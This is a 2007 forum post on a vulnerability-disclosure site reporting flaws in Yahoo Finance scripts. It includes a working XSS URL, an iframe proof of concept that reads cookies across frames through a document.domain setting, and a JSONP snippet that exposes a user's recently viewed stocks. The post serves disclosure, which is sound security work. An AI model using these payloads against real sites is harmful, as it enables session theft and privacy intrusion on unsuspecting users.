Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Yahoo Finance vulnerabilities
Posted by: trev
Date: March 18, 2007 11:39AM

I noticed a very helpful ad script on Yahoo Finance: [ads.finance.yahoo.com]. If you look at the source code, there is an error message that will guide you through the required parameters :)

Unfortunately it will not mention a very nifty optional parameter called "cbk". Why require hackers to break out of strings? Let them inject JavaScript code directly!

http://ads.finance.yahoo.com/yfs_adds?f=97469771&p=finance&cbk=window.alert(/XSS/.source)&l=nada

There is more. Another optional parameter called "dd" will make this page set document.domain - to whatever you like. Yes, we have seen it before. It can be exploited from any .com domain in exactly the same way:

<script>
  document.domain = "com";
  function ownMe() {
    alert(frames[0].document.cookie);
  }
</script>
<iframe src="http://ads.finance.yahoo.com/yfs_adds?f=97469771&p=finance&cbk=ownMe&l=nada&dd=com"></iframe>

Interestingly, I found almost exactly the same script in Yahoo Mail Beta - but it cannot be exploited. It ignores the dd parameter and only accepts predefined values for cbk. There are a few other parameters that are echoed into the JavaScript code - but all are checked properly.

Finally a small information disclosure hole:

http://finance.yahoo.com/services/1.0/instrument//leftpanelinfo?callback=whatever

With this script one can read out which stocks the user has been looking at:

<script>
  function dump(data) {
    document.writeln("Have been visiting Yahoo Finance recently? Here is what you looked at:<br><br>");
    for (var i = 0; i < data.recentsymbols.length; i++)
      document.writeln(data.recentsymbols.name + "<br>");
  }
</script>
<script src="http://finance.yahoo.com/services/1.0/instrument//leftpanelinfo?callback=dump"></script>

Options: ReplyQuote


Sorry, only registered users may post in this forum.